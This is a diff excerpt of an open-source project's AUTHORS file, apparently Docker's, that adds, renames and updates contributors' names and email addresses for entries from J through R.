 Jeffrey van Gogh <jvg@google.com>
 Jenny Gebske <jennifer@gebske.de>
+Jeremy Chambers <jeremy@thehipbot.com>
 Jeremy Grosser <jeremy@synack.me>
 Jeremy Price <jprice.rhit@gmail.com>
 Jeremy Qian <vanpire110@163.com>
 Jeremy Unruh <jeremybunruh@gmail.com>
+Jeremy Yallop <yallop@docker.com>
+Jeroen Franse <jeroenfranse@gmail.com>
 Jeroen Jacobs <github@jeroenj.be>
 Jesse Dearing <jesse.dearing@gmail.com>
 Jesse Dubay <jesse@thefortytwo.net>
 Jessica Frazelle <jessfraz@google.com>
 Jezeniel Zapanta <jpzapanta22@gmail.com>
-jgeiger <jgeiger@gmail.com>
 Jhon Honce <jhonce@redhat.com>
 Ji.Zhilong <zhilongji@gmail.com>
 Jian Zhang <zhangjian.fnst@cn.fujitsu.com>
-jianbosun <wonderflow.sun@gmail.com>
+Jie Luo <luo612@zju.edu.cn>
+Jihyun Hwang <jhhwang@telcoware.com>
 Jilles Oldenbeuving <ojilles@gmail.com>
 Jim Alateras <jima@comware.com.au>
+Jim Galasyn <jim.galasyn@docker.com>
+Jim Minter <jminter@redhat.com>
 Jim Perrin <jperrin@centos.org>
 Jimmy Cuadra <jimmy@jimmycuadra.com>
 Jimmy Puckett <jimmy.puckett@spinen.com>
+Jimmy Song <rootsongjc@gmail.com>
 jimmyxian <jimmyxian2004@yahoo.com.cn>
 Jinsoo Park <cellpjs@gmail.com>
 Jiri Popelka <jpopelka@redhat.com>
+Jiuyue Ma <majiuyue@huawei.com>
 Jiří Župka <jzupka@redhat.com>
 jjy <jiangjinyang@outlook.com>
 jmzwcn <jmzwcn@gmail.com>
@@ -722,6 +880,7 @@ Joel Friedly <joelfriedly@gmail.com>
 Joel Handwell <joelhandwell@gmail.com>
 Joel Hansson <joel.hansson@ecraft.com>
 Joel Wurtz <jwurtz@jolicode.com>
+Joey Geiger <jgeiger@gmail.com>
 Joey Geiger <jgeiger@users.noreply.github.com>
 Joey Gibson <joey@joeygibson.com>
 Joffrey F <joffrey@docker.com>
@@ -733,18 +892,26 @@ John Costa <john.costa@gmail.com>
 John Feminella <jxf@jxf.me>
 John Gardiner Myers <jgmyers@proofpoint.com>
 John Gossman <johngos@microsoft.com>
+John Harris <john@johnharris.io>
 John Howard (VM) <John.Howard@microsoft.com>
+John Laswell <john.n.laswell@gmail.com>
+John Maguire <jmaguire@duosecurity.com>
+John Mulhausen <john@docker.com>
 John OBrien III <jobrieniii@yahoo.com>
 John Starks <jostarks@microsoft.com>
+John Stephens <johnstep@docker.com>
 John Tims <john.k.tims@gmail.com>
+John V. Martinez <jvmatl@gmail.com>
 John Warwick <jwarwick@gmail.com>
 John Willis <john.willis@docker.com>
-johnharris85 <john@johnharris.io>
+Jon Johnson <jonjohnson@google.com>
+Jon Surrell <jon.surrell@gmail.com>
 Jon Wedaman <jweede@gmail.com>
 Jonas Pfenniger <jonas@pfenniger.name>
 Jonathan A. Sternberg <jonathansternberg@gmail.com>
 Jonathan Boulle <jonathanboulle@gmail.com>
 Jonathan Camp <jonathan@irondojo.com>
+Jonathan Choy <jonathan.j.choy@gmail.com>
 Jonathan Dowland <jon+github@alcopop.org>
 Jonathan Lebon <jlebon@redhat.com>
 Jonathan Lomas <jonathan@floatinglomas.ca>
@@ -753,29 +920,40 @@ Jonathan Mueller <j.mueller@apoveda.ch>
 Jonathan Pares <jonathanpa@users.noreply.github.com>
 Jonathan Rudenberg <jonathan@titanous.com>
 Jonathan Stoppani <jonathan.stoppani@divio.com>
+Jonh Wendell <jonh.wendell@redhat.com>
+Joni Sar <yoni@cocycles.com>
 Joost Cassee <joost@cassee.net>
-Jordan <jjn2009@users.noreply.github.com>
 Jordan Arentsen <blissdev@gmail.com>
+Jordan Jennings <jjn2009@gmail.com>
 Jordan Sissel <jls@semicomplete.com>
-Jose Diaz-Gonzalez <josegonzalez@users.noreply.github.com>
+Jorge Marin <chipironcin@users.noreply.github.com>
+Jorit Kleine-Möllhoff <joppich@bricknet.de>
+Jose Diaz-Gonzalez <jose@seatgeek.com>
 Joseph Anthony Pasquale Holsten <joseph@josephholsten.com>
 Joseph Hager <ajhager@gmail.com>
 Joseph Kern <jkern@semafour.net>
+Joseph Rothrock <rothrock@rothrock.org>
 Josh <jokajak@gmail.com>
 Josh Bodah <jb3689@yahoo.com>
+Josh Bonczkowski <josh.bonczkowski@gmail.com>
 Josh Chorlton <jchorlton@gmail.com>
+Josh Eveleth <joshe@opendns.com>
 Josh Hawn <josh.hawn@docker.com>
 Josh Horwitz <horwitz@addthis.com>
 Josh Poimboeuf <jpoimboe@redhat.com>
+Josh Soref <jsoref@gmail.com>
+Josh Wilson <josh.wilson@fivestars.com>
 Josiah Kiehl <jkiehl@riotgames.com>
 José Tomás Albornoz <jojo@eljojo.net>
+Joyce Jang <mail@joycejang.com>
 JP <jpellerin@leapfrogonline.com>
-jrabbit <jackjrabbit@gmail.com>
 Julian Taylor <jtaylor.debian@googlemail.com>
 Julien Barbier <write0@gmail.com>
 Julien Bisconti <veggiemonk@users.noreply.github.com>
 Julien Bordellier <julienbordellier@gmail.com>
 Julien Dubois <julien.dubois@gmail.com>
+Julien Kassar <github@kassisol.com>
+Julien Maitrehenry <julien.maitrehenry@me.com>
 Julien Pervillé <julien.perville@perfect-memory.com>
 Julio Montes <imc.coder@gmail.com>
 Jun-Ru Chang <jrjang@gmail.com>
@@ -783,17 +961,19 @@ Jussi Nummelin <jussi.nummelin@gmail.com>
 Justas Brazauskas <brazauskasjustas@gmail.com>
 Justin Cormack <justin.cormack@docker.com>
 Justin Force <justin.force@gmail.com>
+Justin Menga <justin.menga@gmail.com>
 Justin Plock <jplock@users.noreply.github.com>
 Justin Simonelis <justin.p.simonelis@gmail.com>
 Justin Terry <juterry@microsoft.com>
 Justyn Temme <justyntemme@gmail.com>
 Jyrki Puttonen <jyrkiput@gmail.com>
-Jérôme Petazzoni <jerome.petazzoni@dotcloud.com>
+Jérôme Petazzoni <jerome.petazzoni@docker.com>
 Jörg Thalheim <joerg@higgsboson.tk>
+K. Heller <pestophagous@gmail.com>
 Kai Blin <kai@samba.org>
-Kai Qiang Wu(Kennan) <wkq5325@gmail.com>
+Kai Qiang Wu (Kennan) <wkq5325@gmail.com>
 Kamil Domański <kamil@domanski.co>
-kamjar gerami <kami.gerami@gmail.com>
+Kamjar Gerami <kami.gerami@gmail.com>
 Kanstantsin Shautsou <kanstantsin.sha@gmail.com>
 Kara Alexandra <kalexandra@us.ibm.com>
 Karan Lyons <karan@karanlyons.com>
@@ -801,12 +981,18 @@ Kareem Khazem <karkhaz@karkhaz.com>
 kargakis <kargakis@users.noreply.github.com>
 Karl Grzeszczak <karlgrz@gmail.com>
 Karol Duleba <mr.fuxi@gmail.com>
+Karthik Karanth <karanth.karthik@gmail.com>
+Karthik Nayak <Karthik.188@gmail.com>
+Kate Heddleston <kate.heddleston@gmail.com>
 Katie McLaughlin <katie@glasnt.com>
 Kato Kazuyoshi <kato.kazuyoshi@gmail.com>
 Katrina Owen <katrina.owen@gmail.com>
 Kawsar Saiyeed <kawsar.saiyeed@projiris.com>
+Kay Yan <kay.yan@daocloud.io>
 kayrus <kay.diam@gmail.com>
+Ke Li <kel@splunk.com>
 Ke Xu <leonhartx.k@gmail.com>
+Kei Ohmura <ohmura.kei@gmail.com>
 Keith Hudgins <greenman@greenman.org>
 Keli Hu <dev@keli.hu>
 Ken Cochrane <kencochrane@gmail.com>
@@ -818,37 +1004,40 @@ Kent Johnson <kentoj@gmail.com>
 Kevin "qwazerty" Houdebert <kevin.houdebert@gmail.com>
 Kevin Burke <kev@inburke.com>
 Kevin Clark <kevin.clark@gmail.com>
+Kevin Feyrer <kevin.feyrer@btinternet.com>
 Kevin J. Lynagh <kevin@keminglabs.com>
 Kevin Jing Qiu <kevin@idempotent.ca>
+Kevin Kern <kaiwentan@harmonycloud.cn>
 Kevin Menard <kevin@nirvdrum.com>
+Kevin Meredith <kevin.m.meredith@gmail.com>
 Kevin P. Kucharczyk <kevinkucharczyk@gmail.com>
 Kevin Richardson <kevin@kevinrichardson.co>
 Kevin Shi <kshi@andrew.cmu.edu>
 Kevin Wallace <kevin@pentabarf.net>
 Kevin Yap <me@kevinyap.ca>
-kevinmeredith <kevin.m.meredith@gmail.com>
 Keyvan Fatehi <keyvanfatehi@gmail.com>
 kies <lleelm@gmail.com>
 Kim BKC Carlbacker <kim.carlbacker@gmail.com>
 Kim Eik <kim@heldig.org>
 Kimbro Staken <kstaken@kstaken.com>
-Kir Kolyshkin <kir@openvz.org>
+Kir Kolyshkin <kolyshkin@gmail.com>
 Kiran Gangadharan <kiran.daredevil@gmail.com>
-Kirill Kolyshkin <kolyshkin@users.noreply.github.com>
 Kirill SIbirev <l0kix2@gmail.com>
 knappe <tyler.knappe@gmail.com>
 Kohei Tsuruta <coheyxyz@gmail.com>
 Koichi Shiraishi <k@zchee.io>
 Konrad Kleine <konrad.wilhelm.kleine@gmail.com>
+Konstantin Gribov <grossws@gmail.com>
 Konstantin L <sw.double@gmail.com>
 Konstantin Pelykh <kpelykh@zettaset.com>
+Krasi Georgiev <krasi@vip-consult.solutions>
 Krasimir Georgiev <support@vip-consult.co.uk>
 Kris-Mikael Krister <krismikael@protonmail.com>
 Kristian Haugene <kristian.haugene@capgemini.com>
 Kristina Zabunova <triara.xiii@gmail.com>
 krrg <krrgithub@gmail.com>
 Kun Zhang <zkazure@gmail.com>
-Kunal Kushwaha <kunal.kushwaha@gmail.com>
+Kunal Kushwaha <kushwaha_kunal_v7@lab.ntt.co.jp>
 Kyle Conroy <kyle.j.conroy@gmail.com>
 Kyle Linden <linden.kyle@gmail.com>
 kyu <leehk1227@gmail.com>
@@ -857,13 +1046,14 @@ Lai Jiangshan <jiangshanlai@gmail.com>
 Lajos Papp <lajos.papp@sequenceiq.com>
 Lakshan Perera <lakshan@laktek.com>
 Lalatendu Mohanty <lmohanty@redhat.com>
-lalyos <lalyos@yahoo.com>
 Lance Chen <cyen0312@gmail.com>
 Lance Kinley <lkinley@loyaltymethods.com>
 Lars Butler <Lars.Butler@gmail.com>
 Lars Kellogg-Stedman <lars@redhat.com>
 Lars R. Damerow <lars@pixar.com>
+Lars-Magnus Skog <ralphtheninja@riseup.net>
 Laszlo Meszaros <lacienator@gmail.com>
+Laura Frank <ljfrank@gmail.com>
 Laurent Erignoux <lerignoux@gmail.com>
 Laurie Voss <github@seldo.com>
 Leandro Siqueira <leandro.siqueira@gmail.com>
@@ -873,16 +1063,20 @@ leeplay <hyeongkyu.lee@navercorp.com>
 Lei Jitang <leijitang@huawei.com>
 Len Weincier <len@cloudafrica.net>
 Lennie <github@consolejunkie.net>
+Leo Gallucci <elgalu3@gmail.com>
 Leszek Kowalski <github@leszekkowalski.pl>
 Levi Blackstone <levi.blackstone@rackspace.com>
 Levi Gross <levi@levigross.com>
+Lewis Daly <lewisdaly@me.com>
 Lewis Marshall <lewis@lmars.net>
 Lewis Peckover <lew+github@lew.io>
+Li Yi <denverdino@gmail.com>
 Liam Macgillavry <liam@kumina.nl>
 Liana Lo <liana.lixia@gmail.com>
 Liang Mingqiang <mqliang.zju@gmail.com>
 Liang-Chi Hsieh <viirya@gmail.com>
-liaoqingwei <liaoqingwei@huawei.com>
+Liao Qingwei <liaoqingwei@huawei.com>
+Lily Guo <lily.guo@docker.com>
 limsy <seongyeol37@gmail.com>
 Lin Lu <doraalin@163.com>
 LingFaKe <lingfake@huawei.com>
@@ -891,50 +1085,63 @@ Liran Tal <liran.tal@gmail.com>
 Liron Levin <liron@twistlock.com>
 Liu Bo <bo.li.liu@oracle.com>
 Liu Hua <sdu.liu@huawei.com>
+liwenqi <vikilwq@zju.edu.cn>
 lixiaobing10051267 <li.xiaobing1@zte.com.cn>
+Liz Zhang <lizzha@microsoft.com>
 LIZAO LI <lzlarryli@gmail.com>
+Lizzie Dixon <_@lizzie.io>
 Lloyd Dewolf <foolswisdom@gmail.com>
 Lokesh Mandvekar <lsm5@fedoraproject.org>
 longliqiang88 <394564827@qq.com>
 Lorenz Leutgeb <lorenz.leutgeb@gmail.com>
-Lorenzo Fontana <fontanalorenzo@me.com>
+Lorenzo Fontana <lo@linux.com>
 Louis Opter <kalessin@kalessin.fr>
+Luca Favatella <luca.favatella@erlang-solutions.com>
 Luca Marturana <lucamarturana@gmail.com>
 Luca Orlandi <luca.orlandi@gmail.com>
 Luca-Bogdan Grigorescu <Luca-Bogdan Grigorescu>
 Lucas Chan <lucas-github@lucaschan.com>
 Lucas Chi <lucas@teacherspayteachers.com>
+Lucas Molas <lmolas@fundacionsadosky.org.ar>
 Luciano Mores <leslau@gmail.com>
 Luis Martínez de Bartolomé Izquierdo <lmartinez@biicode.com>
+Luiz Svoboda <luizek@gmail.com>
 Lukas Waslowski <cr7pt0gr4ph7@gmail.com>
 lukaspustina <lukas.pustina@centerdevice.com>
 Lukasz Zajaczkowski <Lukasz.Zajaczkowski@ts.fujitsu.com>
-lukemarsden <luke@digital-crocus.com>
+Luke Marsden <me@lukemarsden.net>
+Lyn <energylyn@zju.edu.cn>
 Lynda O'Leary <lyndaoleary29@gmail.com>
 Lénaïc Huard <lhuard@amadeus.com>
+Ma Müller <mueller-ma@users.noreply.github.com>
 Ma Shimiao <mashimiao.fnst@cn.fujitsu.com>
 Mabin <bin.ma@huawei.com>
+Madhan Raj Mookkandy <MadhanRaj.Mookkandy@microsoft.com>
 Madhav Puri <madhav.puri@gmail.com>
 Madhu Venugopal <madhu@socketplane.io>
-Mageee <21521230.zju.edu.cn>
+Mageee <fangpuyi@foxmail.com>
 Mahesh Tiyyagura <tmahesh@gmail.com>
 malnick <malnick@gmail..com>
 Malte Janduda <mail@janduda.net>
-manchoz <giampaolo@trampolineup.com>
 Manfred Touron <m@42.am>
 Manfred Zabarauskas <manfredas@zabarauskas.com>
+Manjunath A Kumatagi <mkumatag@in.ibm.com>
 Mansi Nahar <mmn4185@rit.edu>
-mansinahar <mansinahar@users.noreply.github.com>
 Manuel Meurer <manuel@krautcomputing.com>
+Manuel Rüger <manuel@rueg.eu>
 Manuel Woelker <github@manuel.woelker.org>
 mapk0y <mapk0y@gmail.com>
 Marc Abramowitz <marc@marc-abramowitz.com>
 Marc Kuo <kuomarc2@gmail.com>
 Marc Tamsky <mtamsky@gmail.com>
+Marcel Edmund Franke <marcel.edmund.franke@gmail.com>
+Marcelo Horacio Fortino <info@fortinux.com>
 Marcelo Salazar <chelosalazar@gmail.com>
 Marco Hennings <marco.hennings@freiheit.com>
+Marcus Cobden <mcobden@cisco.com>
 Marcus Farkas <toothlessgear@finitebox.com>
 Marcus Linke <marcus.linke@gmx.de>
+Marcus Martins <marcus@docker.com>
 Marcus Ramberg <marcus@nordaaker.com>
 Marek Goldmann <marek.goldmann@gmail.com>
 Marian Marinov <mm@yuhu.biz>
@@ -946,10 +1153,15 @@ Marius Voila <marius.voila@gmail.com>
 Mark Allen <mrallen1@yahoo.com>
 Mark McGranaghan <mmcgrana@gmail.com>
 Mark McKinstry <mmckinst@umich.edu>
+Mark Milstein <mark@epiloque.com>
+Mark Oates <fl0yd@me.com>
+Mark Parker <godefroi@users.noreply.github.com>
 Mark West <markewest@gmail.com>
+Markan Patel <mpatel678@gmail.com>
 Marko Mikulicic <mmikulicic@gmail.com>
 Marko Tibold <marko@tibold.nl>
 Markus Fix <lispmeister@gmail.com>
+Markus Kortlang <hyp3rdino@googlemail.com>
 Martijn Dwars <ikben@martijndwars.nl>
 Martijn van Oosterhout <kleptog@svana.org>
 Martin Honermeyer <maze@strahlungsfrei.de>
@@ -958,10 +1170,14 @@ Martin Mosegaard Amdisen <martin.amdisen@praqma.com>
 Martin Redmond <redmond.martin@gmail.com>
 Mary Anthony <mary.anthony@docker.com>
 Masahito Zembutsu <zembutsu@users.noreply.github.com>
+Masato Ohba <over.rye@gmail.com>
+Masayuki Morita <minamijoyo@gmail.com>
 Mason Malone <mason.malone@gmail.com>
 Mateusz Sulima <sulima.mateusz@gmail.com>
 Mathias Monnerville <mathias@monnerville.com>
+Mathieu Champlon <mathieu.champlon@docker.com>
 Mathieu Le Marec - Pasquet <kiorky@cryptelium.net>
+Mathieu Parent <math.parent@gmail.com>
 Matt Apperson <me@mattapperson.com>
 Matt Bachmann <bachmann.matt@gmail.com>
 Matt Bentley <matt.bentley@docker.com>
@@ -970,17 +1186,20 @@ Matt Hoyle <matt@deployable.co>
 Matt McCormick <matt.mccormick@kitware.com>
 Matt Moore <mattmoor@google.com>
 Matt Richardson <matt@redgumtech.com.au>
+Matt Rickard <mrick@google.com>
 Matt Robenolt <matt@ydekproductions.com>
+Matt Schurenko <matt.schurenko@gmail.com>
+Matt Williams <mattyw@me.com>
 Matthew Heon <mheon@redhat.com>
+Matthew Lapworth <matthewl@bit-shift.net>
 Matthew Mayer <matthewkmayer@gmail.com>
+Matthew Mosesohn <raytrac3r@gmail.com>
 Matthew Mueller <mattmuelle@gmail.com>
 Matthew Riley <mattdr@google.com>
 Matthias Klumpp <matthias@tenstral.net>
 Matthias Kühnle <git.nivoc@neverbox.com>
 Matthias Rampke <mr@soundcloud.com>
 Matthieu Hauglustaine <matt.hauglustaine@gmail.com>
-mattymo <raytrac3r@gmail.com>
-mattyw <mattyw@me.com>
 Mauricio Garavaglia <mauricio@medallia.com>
 mauriyouth <mauriyouth@gmail.com>
 Max Shytikov <mshytikov@gmail.com>
@@ -1008,12 +1227,15 @@ Michael Friis <friism@gmail.com>
 Michael Gorsuch <gorsuch@github.com>
 Michael Grauer <michael.grauer@kitware.com>
 Michael Holzheu <holzheu@linux.vnet.ibm.com>
-Michael Hudson-Doyle <michael.hudson@linaro.org>
+Michael Hudson-Doyle <michael.hudson@canonical.com>
 Michael Huettermann <michael@huettermann.net>
+Michael Irwin <mikesir87@gmail.com>
 Michael Käufl <docker@c.michael-kaeufl.de>
 Michael Neale <michael.neale@gmail.com>
+Michael Nussbaum <michael.nussbaum@getbraintree.com>
 Michael Prokop <github@michael-prokop.at>
 Michael Scharf <github@scharf.gr>
+Michael Spetsiotis <michael_spets@hotmail.com>
 Michael Stapelberg <michael+gh@stapelberg.de>
 Michael Steinert <mike.steinert@gmail.com>
 Michael Thies <michaelthies78@gmail.com>
@@ -1021,10 +1243,11 @@ Michael West <mwest@mdsol.com>
 Michal Fojtik <mfojtik@redhat.com>
 Michal Gebauer <mishak@mishak.net>
 Michal Jemala <michal.jemala@gmail.com>
-Michal Minar <miminar@redhat.com>
+Michal Minář <miminar@redhat.com>
 Michal Wieczorek <wieczorek-michal@wp.pl>
 Michaël Pailloncy <mpapo.dev@gmail.com>
 Michał Czeraszkiewicz <czerasz@gmail.com>
+Michał Gryko <github@odkurzacz.org>
 Michiel@unhosted <michiel@unhosted.org>
 Mickaël FORTUNATO <morsi.morsicus@gmail.com>
 Miguel Angel Fernández <elmendalerenda@gmail.com>
@@ -1032,42 +1255,48 @@ Miguel Morales <mimoralea@gmail.com>
 Mihai Borobocea <MihaiBorob@gmail.com>
 Mihuleacc Sergiu <mihuleac.sergiu@gmail.com>
 Mike Brown <brownwm@us.ibm.com>
+Mike Casas <mkcsas0@gmail.com>
 Mike Chelen <michael.chelen@gmail.com>
 Mike Danese <mikedanese@google.com>
 Mike Dillon <mike@embody.org>
 Mike Dougherty <mike.dougherty@docker.com>
+Mike Estes <mike.estes@logos.com>
 Mike Gaffney <mike@uberu.com>
 Mike Goelzer <mike.goelzer@docker.com>
 Mike Leone <mleone896@gmail.com>
+Mike Lundy <mike@fluffypenguin.org>
 Mike MacCana <mike.maccana@gmail.com>
 Mike Naberezny <mike@naberezny.com>
 Mike Snitzer <snitzer@redhat.com>
 mikelinjie <294893458@qq.com>
 Mikhail Sobolev <mss@mawhrin.net>
+Miklos Szegedi <miklos.szegedi@cloudera.com>
+Milind Chawre <milindchawre@gmail.com>
 Miloslav Trmač <mitr@redhat.com>
 mingqing <limingqing@cyou-inc.com>
 Mingzhen Feng <fmzhen@zju.edu.cn>
 Misty Stanley-Jones <misty@docker.com>
 Mitch Capper <mitch.capper@gmail.com>
+Mizuki Urushida <z11111001011@gmail.com>
 mlarcher <github@ringabell.org>
 Mohammad Banikazemi <mb@us.ibm.com>
 Mohammed Aaqib Ansari <maaquib@gmail.com>
 Mohit Soni <mosoni@ebay.com>
+Moorthy RS <rsmoorthy@gmail.com>
 Morgan Bauer <mbauer@us.ibm.com>
 Morgante Pell <morgante.pell@morgante.net>
 Morgy93 <thomas@ulfertsprygoda.de>
 Morten Siebuhr <sbhr@sbhr.dk>
 Morton Fox <github@qslw.com>
 Moysés Borges <moysesb@gmail.com>
-mqliang <mqliang.zju@gmail.com>
+mrfly <mr.wrfly@gmail.com>
 Mrunal Patel <mrunalp@gmail.com>
-msabansal <sabansal@microsoft.com>
-mschurenko <matt.schurenko@gmail.com>
-muge <stevezhang2014@gmail.com>
+Muayyad Alsadi <alsadi@gmail.com>
 Mustafa Akın <mustafa91@gmail.com>
 Muthukumar R <muthur@gmail.com>
 Máximo Cuadros <mcuadros@gmail.com>
 Médi-Rémi Hashim <medimatrix@users.noreply.github.com>
+Nace Oroz <orkica@gmail.com>
 Nahum Shalman <nshalman@omniti.com>
 Nakul Pathak <nakulpathak3@hotmail.com>
 Nalin Dahyabhai <nalin@redhat.com>
@@ -1083,33 +1312,44 @@ Nathan Kleyn <nathan@nathankleyn.com>
 Nathan LeClaire <nathan.leclaire@docker.com>
 Nathan McCauley <nathan.mccauley@docker.com>
 Nathan Williams <nathan@teamtreehouse.com>
+Naveed Jamil <naveed.jamil@tenpearls.com>
 Neal McBurnett <neal@mcburnett.org>
+Neil Horman <nhorman@tuxdriver.com>
 Neil Peterson <neilpeterson@outlook.com>
 Nelson Chen <crazysim@gmail.com>
 Neyazul Haque <nuhaque@gmail.com>
 Nghia Tran <nghia@google.com>
 Niall O'Higgins <niallo@unworkable.org>
 Nicholas E. Rabenau <nerab@gmx.at>
-nick <nicholasjamesrusso@gmail.com>
 Nick DeCoursin <n.decoursin@foodpanda.com>
 Nick Irvine <nfirvine@nfirvine.com>
+Nick Neisen <nwneisen@gmail.com>
 Nick Parker <nikaios@gmail.com>
 Nick Payne <nick@kurai.co.uk>
+Nick Russo <nicholasjamesrusso@gmail.com>
 Nick Stenning <nick.stenning@digital.cabinet-office.gov.uk>
 Nick Stinemates <nick@stinemates.org>
+NickrenREN <yuquan.ren@easystack.cn>
 Nicola Kabar <nicolaka@gmail.com>
-Nicolas Borboën <ponsfrilus@users.noreply.github.com>
-Nicolas De loof <nicolas.deloof@gmail.com>
+Nicolas Borboën <ponsfrilus@gmail.com>
+Nicolas De Loof <nicolas.deloof@gmail.com>
 Nicolas Dudebout <nicolas.dudebout@gatech.edu>
 Nicolas Goy <kuon@goyman.com>
 Nicolas Kaiser <nikai@nikai.net>
+Nicolas Sterchele <sterchele.nicolas@gmail.com>
 Nicolás Hock Isaza <nhocki@gmail.com>
 Nigel Poulton <nigelpoulton@hotmail.com>
+Nik Nyby <nikolas@gnu.org>
+Nikhil Chawla <chawlanikhil24@gmail.com>
 NikolaMandic <mn080202@gmail.com>
-nikolas <nnyby@columbia.edu>
+Nikolas Garofil <nikolas.garofil@uantwerpen.be>
+Nikolay Milovanov <nmil@itransformers.net>
 Nirmal Mehta <nirmalkmehta@gmail.com>
 Nishant Totla <nishanttotla@gmail.com>
 NIWA Hideyuki <niwa.niwa@nifty.ne.jp>
+Noah Meyerhans <nmeyerha@amazon.com>
+Noah Treuhaft <noah.treuhaft@docker.com>
+NobodyOnSE <ich@sektor.selfip.com>
 noducks <onemannoducks@gmail.com>
 Nolan Darilek <nolan@thewordnerd.info>
 nponeccop <andy.melnikov@gmail.com>
@@ -1117,8 +1357,6 @@ Nuutti Kotivuori <naked@iki.fi>
 nzwsch <hi@nzwsch.com>
 O.S. Tezer <ostezer@gmail.com>
 objectified <objectified@gmail.com>
-OddBloke <daniel@daniel-watkins.co.uk>
-odk- <github@odkurzacz.org>
 Oguz Bilgic <fisyonet@gmail.com>
 Oh Jinkyun <tintypemolly@gmail.com>
 Ohad Schneider <ohadschn@users.noreply.github.com>
@@ -1128,21 +1366,20 @@ Oliver Neal <ItsVeryWindy@users.noreply.github.com>
 Olivier Gambier <dmp42@users.noreply.github.com>
 Olle Jonsson <olle.jonsson@gmail.com>
 Oriol Francès <oriolfa@gmail.com>
-orkaa <orkica@gmail.com>
 Oskar Niburski <oskarniburski@gmail.com>
 Otto Kekäläinen <otto@seravo.fi>
-oyld <oyld0210@163.com>
-ozlerhakan <hakan.ozler@kodcu.com>
-paetling <paetling@gmail.com>
-pandrew <letters@paulnotcom.se>
-panticz <mail@konczalski.de>
+Ouyang Liduo <oyld0210@163.com>
+Ovidio Mallo <ovidio.mallo@gmail.com>
+Panagiotis Moustafellos <pmoust@elastic.co>
 Paolo G. Giarrusso <p.giarrusso@gmail.com>
+Pascal <pascalgn@users.noreply.github.com>
 Pascal Borreli <pascal@borreli.com>
 Pascal Hartig <phartig@rdrei.net>
 Patrick Böänziger <patrick.baenziger@bsi-software.com>
 Patrick Devine <patrick.devine@docker.com>
 Patrick Hemmer <patrick.hemmer@gmail.com>
 Patrick Stapleton <github@gdi2290.com>
+Patrik Cyvoct <patrik@ptrk.io>
 pattichen <craftsbear@gmail.com>
 Paul <paul9869@gmail.com>
 paul <paul@inkling.com>
@@ -1152,6 +1389,7 @@ Paul Bowsher <pbowsher@globalpersonals.co.uk>
 Paul Furtado <pfurtado@hubspot.com>
 Paul Hammond <paul@paulhammond.org>
 Paul Jimenez <pj@place.org>
+Paul Kehrer <paul.l.kehrer@gmail.com>
 Paul Lietar <paul@lietar.net>
 Paul Liljenberg <liljenberg.paul@gmail.com>
 Paul Morie <pmorie@gmail.com>
@@ -1159,24 +1397,29 @@ Paul Nasrat <pnasrat@gmail.com>
 Paul Weaver <pauweave@cisco.com>
 Paulo Ribeiro <paigr.io@gmail.com>
 Pavel Lobashov <ShockwaveNN@gmail.com>
+Pavel Pletenev <cpp.create@gmail.com>
 Pavel Pospisil <pospispa@gmail.com>
 Pavel Sutyrin <pavel.sutyrin@gmail.com>
-Pavel Tikhomirov <ptikhomirov@parallels.com>
+Pavel Tikhomirov <ptikhomirov@virtuozzo.com>
 Pavlos Ratis <dastergon@gentoo.org>
 Pavol Vargovcik <pallly.vargovcik@gmail.com>
+Pawel Konczalski <mail@konczalski.de>
 Peeyush Gupta <gpeeyush@linux.vnet.ibm.com>
 Peggy Li <peggyli.224@gmail.com>
 Pei Su <sillyousu@gmail.com>
+Peng Tao <bergwolf@gmail.com>
 Penghan Wang <ph.wang@daocloud.io>
+Per Weijnitz <per.weijnitz@gmail.com>
 perhapszzy@sina.com <perhapszzy@sina.com>
-pestophagous <pestophagous@users.noreply.github.com>
 Peter Bourgon <peter@bourgon.org>
 Peter Braden <peterbraden@peterbraden.co.uk>
-Peter Choi <reikani@Peters-MacBook-Pro.local>
-Peter Dave Hello <PeterDaveHello@users.noreply.github.com>
+Peter Bücker <peter.buecker@pressrelations.de>
+Peter Choi <phkchoi89@gmail.com>
+Peter Dave Hello <hsu@peterdavehello.org>
 Peter Edge <peter.edge@gmail.com>
 Peter Ericson <pdericson@gmail.com>
 Peter Esbensen <pkesbensen@gmail.com>
+Peter Jaffe <pjaffe@nevo.com>
 Peter Malmgren <ptmalmgren@gmail.com>
 Peter Salvatore <peter@psftw.com>
 Peter Volpe <petervo@redhat.com>
@@ -1185,10 +1428,13 @@ Petr Švihlík <svihlik.petr@gmail.com>
 Phil <underscorephil@gmail.com>
 Phil Estes <estesp@linux.vnet.ibm.com>
 Phil Spitler <pspitler@gmail.com>
+Philip Alexander Etling <paetling@gmail.com>
 Philip Monroe <phil@philmonroe.com>
+Philipp Gillé <philipp.gille@gmail.com>
 Philipp Wahala <philipp.wahala@gmail.com>
 Philipp Weissensteiner <mail@philippweissensteiner.com>
 Phillip Alexander <git@phillipalexander.io>
+phineas <phin@phineas.io>
 pidster <pid@pidster.com>
 Piergiuliano Bossi <pgbossi@gmail.com>
 Pierre <py@poujade.org>
@@ -1201,14 +1447,17 @@ pixelistik <pixelistik@users.noreply.github.com>
 Porjo <porjo38@yahoo.com.au>
 Poul Kjeldager Sørensen <pks@s-innovations.net>
 Pradeep Chhetri <pradeep@indix.com>
+Pradip Dhara <pradipd@microsoft.com>
 Prasanna Gautam <prasannagautam@gmail.com>
+Pratik Karki <prertik@outlook.com>
 Prayag Verma <prayag.verma@gmail.com>
+Priya Wadhwa <priyawadhwa@google.com>
 Przemek Hejman <przemyslaw.hejman@gmail.com>
+Pure White <daniel48@126.com>
 pysqz <randomq@126.com>
-qg <1373319223@qq.com>
-qhuang <h.huangqiang@huawei.com>
 Qiang Huang <h.huangqiang@huawei.com>
-qq690388648 <690388648@qq.com>
+Qinglan Peng <qinglanpeng@zju.edu.cn>
+qudongfang <qudongfang@gmail.com>
 Quentin Brossard <qbrossard@gmail.com>
 Quentin Perez <qperez@ocs.online.net>
 Quentin Tayssier <qtayssier@gmail.com>
@@ -1217,6 +1466,7 @@ Rafal Jeczalik <rjeczalik@gmail.com>
 Rafe Colton <rafael.colton@gmail.com>
 Raghavendra K T <raghavendra.kt@linux.vnet.ibm.com>
 Raghuram Devarakonda <draghuram@gmail.com>
+Raja Sami <raja.sami@tenpearls.com>
 Rajat Pandit <rp@rajatpandit.com>
 Rajdeep Dua <dua_rajdeep@yahoo.com>
 Ralf Sippl <ralf.sippl@gmail.com>
@@ -1225,15 +1475,18 @@ Ralph Bean <rbean@redhat.com>
 Ramkumar Ramachandra <artagnon@gmail.com>
 Ramon Brooker <rbrooker@aetherealmind.com>
 Ramon van Alteren <ramon@vanalteren.nl>
